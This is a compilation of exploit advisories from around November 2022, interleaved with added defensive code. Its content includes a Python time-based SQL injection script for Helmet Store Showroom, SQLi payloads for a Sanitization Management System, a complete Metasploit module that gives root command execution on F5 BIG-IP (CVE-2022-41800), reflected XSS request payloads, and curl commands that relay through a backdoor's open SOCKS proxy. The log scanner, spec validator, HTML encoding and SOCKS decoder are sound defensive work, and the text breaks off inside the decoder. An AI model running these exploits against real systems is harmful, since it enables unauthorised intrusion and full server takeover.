<pre><code># Exploit Title: Helmet Store Showroom 1.0 - authenticated SQL Injection<br /># Date: 25-11-2022<br /># Exploit Author: syad<br /># Vendor Homepage: https://www.sourcecodester.com<br /># Software Link: https://www.sourcecodester.com/php/15851/helmet-store-showroom-site-php-and-mysql-free-source-code.html<br /># Version: 1.0<br /># Tested on: Windows 10 + XAMPP 3.2.4<br /># CVE ID : N/A<br /><br /># Description<br /><br /># The id parameter of view_product.php is not validated, which allows authenticated time-based SQL injection.<br /><br /><br />import requests<br />import sys<br />import pyfiglet<br />sess = requests.Session()<br /><br /><br />proxies = {"https": "https://127.0.0.1:8080", "http": "http://127.0.0.1:8080"}<br /><br />def login1(ip,username,password):<br />    x = "http://%s/hss/classes/Login.php?f=login" % ip<br />    login = {'username':username, 'password':password}<br />    r = sess.post(x, data=login, proxies=proxies)<br />    #print(r.content)<br /><br /><br /><br />def login(ip):<br />    x = ("http://%s/hss/admin") % ip<br />    r = sess.get(x,proxies=proxies)<br />    if "Welcome to Helmet Store Showroom - PHP" in r.text:<br />        print("--------------------------------------------")<br />        print("[+] Success Login")<br /><br /><br />def detect_sql(ip):<br />    x = "http://%s/hss/admin/?page=products/view_product&id=2'" % ip<br />    r = sess.get(x,proxies=proxies)<br />    if "You have an error in your SQL syntax" in r.text:<br />        print("[+] Found SQL Error")<br /><br /><br />def time_based_sqli(ip):<br />    x = "http://%s/hss/admin/?page=products/view_product&id=2'+or+sleep(5)--+-" % ip<br />    r = sess.get(x,proxies=proxies)<br />    print("[+] Time Based SQL Found")<br />    print("[*]!!! Time To Report !!!")<br /><br /><br />if __name__ == "__main__":<br />    result = pyfiglet.figlet_format("PWN")<br />    print(result)<br />    try:<br />        ip = sys.argv[1].strip()<br />        username = sys.argv[2].strip()<br />        password = sys.argv[3].strip()<br />    except IndexError:<br />        print("[-] Usage %s <ip> <username> <password>" % sys.argv[0])<br />        print("[-] Example: %s 192.168.1.x" % sys.argv[0])<br />        sys.exit(-1)<br /><br />login1(ip,username,password)<br />login(ip)<br />detect_sql(ip)<br />time_based_sqli(ip)<br /></code></pre>
<pre><code>## Title: SMS - PHP (by: oretnom23 ) v1.0 SQLi<br />## Author: nu11secur1ty<br />## Date: 11.25.2022<br />## Vendor: https://github.com/oretnom23,<br />https://www.sourcecodester.com/users/tips23<br />## Software: https://www.sourcecodester.com/download-code?nid=15770&title=Sanitization+Management+System+Project+in+PHP+and+MySQL+Free+Source+Code<br />## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2022/Sanitization-Management-System-1.0<br /><br />## Description:<br />The `id` parameter appears to be vulnerable to SQL injection attacks.<br />The attacker can get all information from this system by using this<br />vulnerability.<br /><br />## STATUS: HIGH Vulnerability - CRITICAL<br /><br />[+] Payload:<br /><br />```MySQL<br />Parameter: id (GET)<br /> Type: boolean-based blind<br /> Title: OR boolean-based blind - WHERE or HAVING clause (NOT)<br /> Payload: p=services/view_service&id=126664801' or '5968'='5975' OR<br />NOT 5461=5461 AND 'gEud'='gEud<br /><br /> Type: error-based<br /> Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or<br />GROUP BY clause (FLOOR)<br /> Payload: p=services/view_service&id=126664801' or '5968'='5975' OR<br />(SELECT 5753 FROM(SELECT COUNT(*),CONCAT(0x7176707671,(SELECT<br />(ELT(5753=5753,1))),0x71767a7071,FLOOR(RAND(0)*2))x FROM<br />INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'DEYy'='DEYy<br /><br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: p=services/view_service&id=126664801' or '5968'='5975'<br />AND (SELECT 6369 FROM (SELECT(SLEEP(5)))Rnfu) AND 'PUfi'='PUfi<br /><br />```<br /><br />## Reproduce:<br />[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2022/Sanitization-Management-System-1.0)<br /><br />## Proof and Exploit:<br />[href](https://streamable.com/rnfvjf)<br /><br />## Time spent<br />`00:30:00`<br /><br /></code></pre>
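<p>Both advisories above (Helmet Store Showroom and the Sanitization Management System) hinge on a numeric <code>id</code> parameter reaching the query unvalidated, and both leave very recognisable traces in the web server's access log: a lone quote, <code>sleep(5)</code>, <code>FLOOR(RAND(0)*2)</code>, and <code>' or 'a'='b</code> style comparisons. The scanner below is an added defensive example, not code from either advisory; it decodes the request target, pulls the <code>id</code> value, and classifies it by the technique the payload resembles. The log lines and the <code>/sms/</code> path are constructed for the demo.</p>

```python
"""Access-log scanner for the SQL injection probes shown in the Helmet Store
Showroom and Sanitization Management System advisories above.  Added defensive
example, not code from either advisory; the log lines and the /sms/ path are
constructed for the demo."""
import re
from urllib.parse import parse_qs, unquote_plus, urlsplit

# Combined-format access log; only client IP, request target and status are used.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Signatures modelled on the advisories' payloads, most specific first, matched
# against a normalized (decoded, lower-cased, whitespace-collapsed) value.
SIGNATURES = [
    ("time-based", re.compile(r"\bsleep\s*\(\s*\d+\s*\)|\bbenchmark\s*\(")),
    ("error-based", re.compile(
        r"floor\s*\(\s*rand\s*\(\s*0?\s*\)\s*\*\s*2\s*\)|extractvalue\s*\(|updatexml\s*\(")),
    ("boolean-based", re.compile(r"'\s*(or|and)\s+(not\s+)?'?\w+'?\s*=\s*'?\w+'?")),
]


def normalize(value):
    """Undo a second layer of URL encoding, drop /* */ comments, fold case and spacing."""
    value = unquote_plus(value)
    value = re.sub(r"/\*.*?\*/", " ", value, flags=re.S)
    return re.sub(r"\s+", " ", value).strip().lower()


def classify(value):
    """Technique a value sent in a numeric id parameter resembles, or None if benign."""
    if re.fullmatch(r"\d+", value):
        return None                      # the only thing view_product.php should receive
    norm = normalize(value)
    for technique, pattern in SIGNATURES:
        if pattern.search(norm):
            return technique
    if "'" in norm or '"' in norm:
        return "quote-probe"             # the bare 2' request that elicits the MySQL error
    return "non-numeric"


def scan_log(lines, param="id"):
    """Return (client_ip, technique, decoded_value) for every suspicious value of param."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        query = urlsplit(m["target"]).query
        for value in parse_qs(query, keep_blank_values=True).get(param, []):
            technique = classify(value)
            if technique:
                findings.append((m["ip"], technique, value))
    return findings


# Constructed log lines: one normal request, then the probes from the two advisories.
SAMPLE_LOG = [
    '10.0.0.7 - - [25/Nov/2022:10:01:02 +0000] "GET /hss/admin/?page=products/view_product&id=2 HTTP/1.1" 200 5120',
    '10.0.0.7 - - [25/Nov/2022:10:01:05 +0000] "GET /hss/admin/?page=products/view_product&id=2%27 HTTP/1.1" 200 4880',
    '10.0.0.7 - - [25/Nov/2022:10:01:09 +0000] "GET /hss/admin/?page=products/view_product&id=2%27+or+sleep(5)--+- HTTP/1.1" 200 4880',
    '10.0.0.9 - - [25/Nov/2022:10:02:00 +0000] "GET /sms/?p=services/view_service&id=126664801%27%20or%20%275968%27%3D%275975%27%20OR%20NOT%205461%3D5461%20AND%20%27gEud%27%3D%27gEud HTTP/1.1" 200 3900',
    '10.0.0.9 - - [25/Nov/2022:10:02:03 +0000] "GET /sms/?p=services/view_service&id=126664801%27%20or%20%275968%27%3D%275975%27%20OR%20(SELECT%205753%20FROM(SELECT%20COUNT(*),CONCAT(0x7176707671,(SELECT%20(ELT(5753%3D5753,1))),0x71767a7071,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.PLUGINS%20GROUP%20BY%20x)a)%20AND%20%27DEYy%27%3D%27DEYy HTTP/1.1" 500 210',
]

if __name__ == "__main__":
    for ip, technique, value in scan_log(SAMPLE_LOG):
        print(f"{ip}\t{technique}\t{value[:60]}")
```

<p>The first line is the only one that passes: a strictly numeric <code>id</code> is what both applications should accept, so the real fix is a cast to integer plus a prepared statement in <code>view_product.php</code> / <code>view_service</code>, and this scanner is only the retrospective check for hosts that were exposed before patching.</p>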
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Exploit::Remote<br /> Rank = ExcellentRanking<br /><br /> include Msf::Exploit::Remote::HttpClient<br /> include Msf::Exploit::FileDropper<br /><br /> def initialize(info = {})<br /> super(<br /> update_info(<br /> info,<br /> 'Name' => 'F5 BIG-IP iControl Authenticated RCE via RPM Creator',<br /> 'Description' => %q{<br /> This module exploits a newline injection into an RPM .rpmspec file<br /> that permits authenticated users to remotely execute commands.<br /><br /> Successful exploitation results in remote code execution<br /> as the root user.<br /> },<br /> 'Author' => [<br /> 'Ron Bowes' # Discovery, PoC, and module<br /> ],<br /> 'References' => [<br /> ['CVE', '2022-41800'],<br /> ['URL', 'https://www.rapid7.com/blog/post/2022/11/16/cve-2022-41622-and-cve-2022-41800-fixed-f5-big-ip-and-icontrol-rest-vulnerabilities-and-exposures/'],<br /> ['URL', 'https://support.f5.com/csp/article/K97843387'],<br /> ['URL', 'https://support.f5.com/csp/article/K13325942'],<br /> ],<br /> 'License' => MSF_LICENSE,<br /> 'DisclosureDate' => '2022-11-16', # Vendor advisory<br /> 'Platform' => ['unix', 'linux'],<br /> 'Arch' => [ARCH_CMD],<br /> 'Privileged' => true,<br /> 'Targets' => [<br /> [ 'Default', {} ]<br /> ],<br /> 'DefaultTarget' => 0,<br /> 'DefaultOptions' => {<br /> 'RPORT' => 443,<br /> 'SSL' => true,<br /> 'PrependFork' => true, # Needed to avoid warnings about timeouts and potential failures across attempts.<br /> 'MeterpreterTryToFork' => true # Needed to avoid warnings about timeouts and potential failures across attempts.<br /> },<br /> 'Notes' => {<br /> 'Stability' => [CRASH_SAFE],<br /> 'Reliability' => [REPEATABLE_SESSION], # One at a time<br /> 'SideEffects' => [<br /> IOC_IN_LOGS,<br /> ARTIFACTS_ON_DISK<br /> ]<br /> }<br /> )<br /> )<br /><br /> 
register_options(<br /> [<br /> OptString.new('HttpUsername', [true, 'iControl username', 'admin']),<br /> OptString.new('HttpPassword', [true, 'iControl password', ''])<br /> ]<br /> )<br /> end<br /><br /> def exploit<br /> # The RPM name is based on these, so we need these to delete the RPM file after<br /> name = rand_text_alphanumeric(5..10)<br /> version = "#{rand_text_numeric(1)}.#{rand_text_numeric(1)}.#{rand_text_numeric(1)}"<br /> release = "#{rand_text_numeric(1)}.#{rand_text_numeric(1)}.#{rand_text_numeric(1)}"<br /><br /> vprint_status('Creating an .rpmspec file on the target...')<br /> result = send_request_cgi({<br /> 'method' => 'POST',<br /> 'uri' => normalize_uri(target_uri.path, '/mgmt/shared/iapp/rpm-spec-creator'),<br /> 'ctype' => 'application/json',<br /> 'authorization' => basic_auth(datastore['HttpUsername'], datastore['HttpPassword']),<br /> 'data' => {<br /> 'specFileData' => {<br /> 'name' => name,<br /> 'srcBasePath' => '/tmp',<br /> 'version' => version,<br /> 'release' => release,<br /> # This is the injection - add newlines then a '%check' section<br /> 'description' => "\n\n%check\n#{payload.encoded}\n",<br /> 'summary' => rand_text_alphanumeric(5..10)<br /> }<br /> }.to_json<br /> })<br /><br /> fail_with(Failure::Unknown, 'Failed to send HTTP request') unless result<br /> fail_with(Failure::NoAccess, 'Authentication failed') if result.code == 401<br /> fail_with(Failure::UnexpectedReply, "Server returned an unexpected response: HTTP/#{result.code}") if result.code != 200<br /><br /> json = result&.get_json_document<br /> fail_with(Failure::UnexpectedReply, "Server didn't return valid JSON") unless json<br /><br /> file_path = json['specFilePath']<br /> fail_with(Failure::UnexpectedReply, "Server didn't return a specFilePath") unless file_path<br /> vprint_status("Created spec file: #{file_path}")<br /> register_file_for_cleanup(file_path)<br /><br /> # We can also use `exit 1` in the %check function to prevent this file<br /> # 
from being created, rather than cleaning it up.. but that seems noisier?<br /> # Neither option gets logged so /shrug<br /> register_file_for_cleanup("/var/config/rest/node/tmp/RPMS/noarch/#{name}-#{version}-#{release}.noarch.rpm")<br /><br /> vprint_status('Building the RPM to trigger the payload...')<br /> result = send_request_cgi({<br /> 'method' => 'POST',<br /> 'uri' => normalize_uri(target_uri.path, '/mgmt/shared/iapp/build-package'),<br /> 'ctype' => 'application/json',<br /> 'authorization' => basic_auth(datastore['HttpUsername'], datastore['HttpPassword']),<br /> 'data' => {<br /> 'state' => {},<br /> 'appName' => rand_text_alphanumeric(5..10),<br /> 'packageDirectory' => '/tmp',<br /> 'specFilePath' => file_path<br /> }.to_json<br /> })<br /> fail_with(Failure::Unknown, 'Failed to send HTTP request') unless result<br /> fail_with(Failure::NoAccess, 'Authentication failed') if result.code == 401<br /> fail_with(Failure::UnexpectedReply, "Server returned an unexpected response: HTTP/#{result.code}") if result.code < 200 || result.code > 299<br /> end<br />end<br /></code></pre>
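<p>The module above works because the RPM-spec creator interpolates the JSON <code>description</code> field into the .rpmspec verbatim, so two newlines followed by <code>%check</code> open a scriptlet section that rpmbuild executes as root. The validator below is an added defensive example (not F5 code): it checks every field for the shape it should have before rendering, rejects any description line that begins with <code>%</code>, escapes the remaining percent signs, and includes an audit helper for spec files that were already written. The spec layout it emits is an assumption, not the real creator's output format.</p>

```python
"""Validation for the fields an RPM-spec creator interpolates into a .rpmspec
file, written against the newline injection above (a description that opens a
%check section).  Added defensive example; it is not F5 code and the spec
layout it emits is an assumption, not the real creator's format."""
import re

TOKEN = re.compile(r"[A-Za-z0-9][A-Za-z0-9._+-]{0,63}")   # Name/Version/Release: one token
ONE_LINE = re.compile(r"[^\r\n%]{1,200}")                   # Summary: one line, no directives
DIRECTIVE = re.compile(r"^[ \t]*%", re.MULTILINE)           # rpmbuild reads a leading % as macro/section
# Sections that make rpmbuild run shell code; a metadata-only spec never needs them.
SCRIPT_SECTIONS = {"%prep", "%build", "%install", "%check", "%clean", "%pre", "%post",
                   "%preun", "%postun", "%pretrans", "%posttrans", "%verifyscript"}


class SpecInjection(ValueError):
    """Raised when a field would change the structure of the generated spec."""


def validate_fields(fields):
    for key in ("name", "version", "release"):
        if not TOKEN.fullmatch(fields.get(key, "")):
            raise SpecInjection(f"{key}: must be a single token without whitespace")
    if not ONE_LINE.fullmatch(fields.get("summary", "")):
        raise SpecInjection("summary: must be one line and must not contain %")
    description = fields.get("description", "")
    if "\r" in description or "\x00" in description:
        raise SpecInjection("description: control characters are not allowed")
    if DIRECTIVE.search(description):
        raise SpecInjection("description: a line starting with % would be parsed as a spec directive")
    if len(description.splitlines()) > 50:
        raise SpecInjection("description: too long")
    return fields


def rejection_reason(fields):
    """Convenience wrapper: the SpecInjection message, or None when the fields are clean."""
    try:
        validate_fields(fields)
    except SpecInjection as exc:
        return str(exc)
    return None


def render_spec(fields):
    """Build the spec text only from validated fields; a literal % is written as %%."""
    f = validate_fields(fields)
    body = (f.get("description", "").strip() or "(no description)").replace("%", "%%")
    return (
        f"Name: {f['name']}\nVersion: {f['version']}\nRelease: {f['release']}\n"
        f"Summary: {f['summary']}\nLicense: unknown\nBuildArch: noarch\n\n"
        f"%description\n{body}\n\n%files\n"
    )


def script_sections(spec_text):
    """Audit an existing spec file: list every section that would execute shell."""
    found = []
    for line in spec_text.splitlines():
        head = (line.split() or [""])[0]
        if head in SCRIPT_SECTIONS:
            found.append(head)
    return found


if __name__ == "__main__":
    # Constructed inputs: a clean package and the injection shape from the module above.
    clean = {"name": "demo", "version": "1.0.0", "release": "1",
             "summary": "demo package", "description": "A harmless description."}
    print(render_spec(clean))
    print(rejection_reason(dict(clean, description="\n\n%check\necho injected\n")))
```

<p>The audit helper is the incident-response side: specs the creator wrote under its temporary path should contain nothing but metadata, <code>%description</code> and <code>%files</code>, so any <code>%check</code>, <code>%build</code> or <code>%post</code> line in one of them is a sign the injection was used.</p>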
<pre><code>## Title: Ecommerce-1.0 XSS-Reflected Hijack-credentials - JavaScript Injection<br />## Author: nu11secur1ty<br />## Date: 11.23.2022<br />## Vendor: https://github.com/winston-dsouza<br />## Software: https://github.com/winston-dsouza/ecommerce-website<br />## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/winston-dsouza/ecommerce-website<br /><br />## Description:<br />The value of the eMail request parameter is copied into the value of<br />an HTML tag attribute which is enclosed in double quotation marks.<br />The attacker can very easily trick the users of this system into<br />visiting a very dangerous link from anywhere, and then it is game over<br />for these customers.<br />The attacker can also build a network of botnet computers by using<br />this vulnerability.<br /><br />## STATUS: HIGH Vulnerability<br /><br />[+] Exploit00:<br /><br />```POST<br />POST /ecommerce/index.php?error=If%20you%20lose%20your%20credentials%20information,%20please%20use%20our%20recovery%20webpage%20to%20recover%20your%20account.%20https://pornhub.com<br />HTTP/1.1<br />Host: pwnedhost.com<br />Accept-Encoding: gzip, deflate<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9<br />Accept-Language: en-US;q=0.9,en;q=0.8<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)<br />AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107<br />Safari/537.36<br />Connection: close<br />Cache-Control: max-age=0<br />Cookie: PHPSESSID=td6bitb72h0e1nuqa4ft9q8e2f<br />Origin: http://pwnedhost.com<br />Upgrade-Insecure-Requests: 1<br />Referer: http://pwnedhost.com/ecommerce/index.php<br />Content-Type: application/x-www-form-urlencoded<br />Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="107", "Chromium";v="107"<br />Sec-CH-UA-Platform: Windows<br />Sec-CH-UA-Mobile: ?0<br />Content-Length: 0<br />```<br />## Description01:<br 
/>JavaScript can be injected into the application response (the vulnerable<br />script is signup_script.php, whose submit handler does no sanitizing).<br />The attacker can also crash the MySQL server by sending very large POST<br />requests to this system's MySQL backend.<br /><br />## STATUS: HIGH Vulnerability - CRITICAL<br /><br />## Real attack:<br /><br />[+] Exploit01:<br /><br />```POST<br />POST /ecommerce/signup_script.php HTTP/1.1<br />Host: pwnedhost.com<br />Accept-Encoding: gzip, deflate<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9<br />Accept-Language: en-US;q=0.9,en;q=0.8<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)<br />AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107<br />Safari/537.36<br />Connection: close<br />Cache-Control: max-age=0<br />Cookie: PHPSESSID=td6bitb72h0e1nuqa4ft9q8e2f<br />Origin: http://pwnedhost.com<br />Upgrade-Insecure-Requests: 1<br />Referer: http://pwnedhost.com/ecommerce/index.php<br />Content-Type: application/x-www-form-urlencoded<br />Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="107", "Chromium";v="107"<br />Sec-CH-UA-Platform: Windows<br />Sec-CH-UA-Mobile: ?0<br />Content-Length: 1070<br /><br 
/>eMail=%3c%61%20%68%72%65%66%3d%22%68%74%74%70%73%3a%2f%2f%70%6f%72%6e%68%75%62%2e%63%6f%6d%2f%22%20%74%61%72%67%65%74%3d%22%5f%62%6c%61%6e%6b%22%20%72%65%6c%3d%22%6e%6f%6f%70%65%6e%65%72%20%6e%6f%66%6f%6c%6c%6f%77%20%75%67%63%22%3e%0a%3c%69%6d%67%20%73%72%63%3d%22%68%74%74%70%73%3a%2f%2f%63%64%6e%35%2d%63%61%70%72%69%6f%66%69%6c%65%73%2e%6e%65%74%64%6e%61%2d%73%73%6c%2e%63%6f%6d%2f%77%70%2d%63%6f%6e%74%65%6e%74%2f%75%70%6c%6f%61%64%73%2f%32%30%31%37%2f%30%37%2f%49%4d%47%5f%30%30%36%38%2e%67%69%66%3f%3f%74%6f%6b%65%6e%3d%47%48%53%41%54%30%41%41%41%41%41%41%42%58%57%47%53%4b%4f%48%37%4d%42%46%4c%45%4b%46%34%4d%36%59%33%59%43%59%59%4b%41%44%54%51%26%72%73%3d%31%22%20%73%74%79%6c%65%3d%22%62%6f%72%64%65%72%3a%31%70%78%20%73%6f%6c%69%64%20%62%6c%61%63%6b%3b%6d%61%78%2d%77%69%64%74%68%3a%31%30%30%25%3b%22%20%61%6c%74%3d%22%50%68%6f%74%6f%20%6f%66%20%42%79%72%6f%6e%20%42%61%79%2c%20%6f%6e%65%20%6f%66%20%41%75%73%74%72%61%6c%69%61%27%73%20%62%65%73%74%20%62%65%61%63%68%65%73%21%22%3e%0a%3c%2f%61%3e&password=s9L%21c7x%21E2&firstName=WoZykRqh&lastName=cqeMPJcJ<br />```<br /><br />## Reproduce:<br />[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/winston-dsouza/ecommerce-website)<br /><br />## Proof and Exploit:<br />[href](https://streamable.com/3r4t36)<br /><br />## Real Exploit:<br />[href](https://streamable.com/n3b5ev)<br /><br />## Real Exploit - code insert:<br />[href](https://streamable.com/64dmo2)<br /><br />## Time spent<br />`1:45`<br /><br /></code></pre>
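<p>The advisory describes two reflection points: the <code>eMail</code> value written raw into a double-quoted attribute, where a <code>"</code> in the input closes the attribute and anything after it becomes new markup, and the <code>index.php?error=</code> text reflected as a free-form message that can carry a phishing link. The snippet below is an added defensive example, not code from the ecommerce-website project; the form markup and the error-code table are assumptions chosen to show the pattern. It renders the unsafe and the encoded form side by side and uses Python's own HTML parser to confirm which elements a browser would actually see.</p>

```python
"""Context-aware output encoding for the signup form and the index.php error
banner described above.  Added defensive example, not code from the
ecommerce-website project; the form markup and the error-code table are
assumptions used to show the pattern."""
import html
import re
from html.parser import HTMLParser

EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")

# index.php?error=... : reflect only a key into a fixed message table, never free text,
# so the page can no longer be made to display an attacker's "recovery" link.
ERROR_MESSAGES = {
    "bad-login": "The e-mail address or password is incorrect.",
    "exists": "An account with that e-mail address already exists.",
}


def validate_email(value):
    """Server-side check that signup_script.php lacks; reject before storing or echoing."""
    return bool(EMAIL_RE.fullmatch(value)) and len(value) <= 254


def render_signup_form(email, first_name=""):
    # Attribute context: html.escape with quote=True also encodes " and ', so the
    # value can never close the attribute it sits in.
    return (
        '<form method="post" action="/ecommerce/signup_script.php">'
        f'<input type="email" name="eMail" value="{html.escape(email, quote=True)}">'
        f'<input type="text" name="firstName" value="{html.escape(first_name, quote=True)}">'
        '</form>'
    )


def render_unsafe_signup_form(email):
    # The pattern the advisory describes: raw request parameter inside a quoted attribute.
    return f'<input type="email" name="eMail" value="{email}">'


def render_error_banner(error_key):
    message = ERROR_MESSAGES.get(error_key, "Something went wrong, please try again.")
    return f'<p class="error">{html.escape(message)}</p>'


class MarkupAudit(HTMLParser):
    """Records which elements the browser would create and what value eMail carries."""

    def __init__(self):
        super().__init__()
        self.tags = []
        self.email_values = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        attrs = dict(attrs)
        if attrs.get("name") == "eMail":
            self.email_values.append(attrs.get("value"))


def audit(rendered):
    parser = MarkupAudit()
    parser.feed(rendered)
    parser.close()
    return parser.tags, parser.email_values


# Constructed attribute-breakout value; the advisory's payload is the same idea with an <a>/<img> pair.
INJECTED_EMAIL = '"><img src="https://example.invalid/track.gif">'

if __name__ == "__main__":
    print("unsafe:", audit(render_unsafe_signup_form(INJECTED_EMAIL)))
    print("encoded:", audit(render_signup_form(INJECTED_EMAIL)))
    print("valid e-mail?", validate_email(INJECTED_EMAIL))
```

<p>In the unsafe rendering the parser reports an extra <code>img</code> element; in the encoded one the only elements are the form and its two inputs, and the <code>eMail</code> attribute round-trips to exactly the submitted string, which is what "copied into an attribute value" should mean.</p>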
<pre><code>Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2022<br />Original source: https://malvuln.com/advisory/f312e3a436995b86b205a1a37b1bf10f.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br />Backup media: infosec.exchange/@malvuln<br /><br />Threat: Backdoor.Win32.Serman.a<br />Vulnerability: Unauthenticated Open Proxy<br />Family: Serman<br />Type: PE32<br />MD5: f312e3a436995b86b205a1a37b1bf10f<br />Vuln ID: MVID-2022-0659<br />Disclosure: 11/22/2022<br />Description: The malware listens on TCP port 21422 by default but it can be changed. Third-party attackers who can connect to the infected system can relay requests from the original connection to the destination and then back to the origination system. Attackers may then be able to launch attacks, download files or port scan third party systems and it will appear as the attacks originated from that infected host.<br /><br />E.g. using port 5555<br /><br />SOCKS4 version 4A server (beta)<br />autor: Stanimir Jordanov * e-mail: stjordanov@hotmail.com<br />Usage: socks4 <LocalPort> [LogFile]<br /><br /><br />C:\dump>wwm.exe 5555 out.txt<br />SOCKS 4 service started: redirecting localhost:5555<br />Press Ctrl+C to end ...<br />Connecting to: 192.168.18.128:80 ID:2C34<br />Connected to: 192.168.18.128:80 ID:2C34<br />Connection closed ID:2C34<br />Connecting to: 192.168.18.128:80 ID:25BC<br />Connected to: 192.168.18.128:80 ID:25BC<br />Connection closed ID:25BC<br />Connecting to: 192.168.18.128:80 ID:A4<br />Connected to: 192.168.18.128:80 ID:A4<br />Connection closed ID:A4<br /><br /><br />Exploit/PoC:<br />Port scan:<br />Connecting to: 192.168.18.128:666 ID:2B04<br />Cannot connect to: 192.168.18.128:666 ID:2B04 <br />Connecting to: 192.168.18.128:21 ID:2DE4<br />Connected to: 192.168.18.128:21 ID:2DE4 <br />Connection closed ID:2DE4<br /><br />(Port scan):<br /><br />(Port closed):<br />C:\Users\gg\Desktop>curl -x socks4://192.168.18.125:5555 http://192.168.18.128:666 
-v<br />* Trying 192.168.18.125:5555...<br />* SOCKS4 communication to 192.168.18.128:666<br />* SOCKS4 connect to IPv4 192.168.18.128 (locally resolved)<br />* Can't complete SOCKS4 connection to 0.0.0.0:0. (91), request rejected or failed.<br />* Closing connection 0<br />curl: (97) Can't complete SOCKS4 connection to 0.0.0.0:0. (91), request rejected or failed.<br /><br />(Port open):<br />C:\Users\gg\Desktop>curl -x socks4://192.168.18.125:5555 http://192.168.18.128:21 -v<br />* Trying 192.168.18.125:5555...<br />* SOCKS4 communication to 192.168.18.128:21<br />* SOCKS4 connect to IPv4 192.168.18.128 (locally resolved)<br />* SOCKS4 request granted.<br />* Connected to 192.168.18.125 (192.168.18.125) port 5555 (#0)<br />> GET / HTTP/1.1<br />> Host: 192.168.18.128:21<br />> User-Agent: curl/7.83.1<br />> Accept: */*<br />><br />* Received HTTP/0.9 when not allowed<br />* Closing connection 0<br />curl: (1) Received HTTP/0.9 when not allowed<br /><br /><br />(Download files):<br />C:\Users\gg\Desktop>curl -x socks4://192.168.18.125:5555 http://192.168.18.128/DOOM.exe -v --output 2.txt<br />* Trying 192.168.18.125:5555...<br /> % Total % Received % Xferd Average Speed Time Time Time Current<br /> Dload Upload Total Spent Left Speed<br /> 0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0* SOCKS4 communication to 192.168.18.128:80<br />* SOCKS4 connect to IPv4 192.168.18.128 (locally resolved)<br />* SOCKS4 request granted.<br />* Connected to 192.168.18.125 (192.168.18.125) port 5555 (#0)<br /> GET /DOOM.exe HTTP/1.1<br /> Host: 192.168.18.128<br /> User-Agent: curl/7.83.1<br /> Accept: */*<br /> <br />* Mark bundle as not supporting multiuse<br />* HTTP 1.0, assume close after body<br /> HTTP/1.0 200 OK<br /> Server: SimpleHTTP/0.6 Python/2.7.6<br /> Date: Tue, 22 Nov 2022 02:15:31 GMT<br /> Content-type: application/x-msdos-program<br /> Content-Length: 103533<br /> Last-Modified: Sat, 03 Aug 2019 04:57:12 GMT<br /> <br />{ [6794 bytes data]<br />100 101k 100 101k 0 
0 474k 0 --:--:-- --:--:-- --:--:-- 488k<br />* Closing connection 0<br /><br />C:\Users\gg\Desktop>2.txt<br />DOOMED!!!<br />Press any key to continue . . .<br /><br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>
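<p>The backdoor above is a plain SOCKS4/4a server with no authentication, so the detection problem is recognising SOCKS4 CONNECT requests being granted on a port that is not a sanctioned proxy (the advisory's sample runs on 5555; the malware's default is 21422). The decoder below is an added detection example, not Malvuln code: it parses the request and reply structures, and flags servers that relayed a connection. The byte samples are constructed to match what curl sends for <code>socks4://</code> and the 90/91 reply codes visible in the curl output above; the client address is made up.</p>

```python
"""SOCKS4/4a request and reply decoder with an open-proxy check, for the
unauthenticated relay described in the Serman advisory above.  Added detection
example (not Malvuln code); the byte samples are constructed to match what curl
sends for socks4:// and what the advisory's curl output reports."""
import ipaddress
import struct

CONNECT, BIND = 1, 2
GRANTED, REJECTED = 90, 91   # curl shows "request granted" and "(91) request rejected or failed"


def parse_socks4_request(data):
    """Decode VN=4 | CD | DSTPORT | DSTIP | USERID NUL [ HOSTNAME NUL ]; None if not SOCKS4."""
    if len(data) < 9 or data[0] != 4 or data[1] not in (CONNECT, BIND):
        return None
    port, raw_ip = struct.unpack("!H4s", data[2:8])
    rest = data[8:]
    nul = rest.find(b"\x00")
    if nul < 0:
        return None
    userid = rest[:nul].decode("latin-1")
    hostname = None
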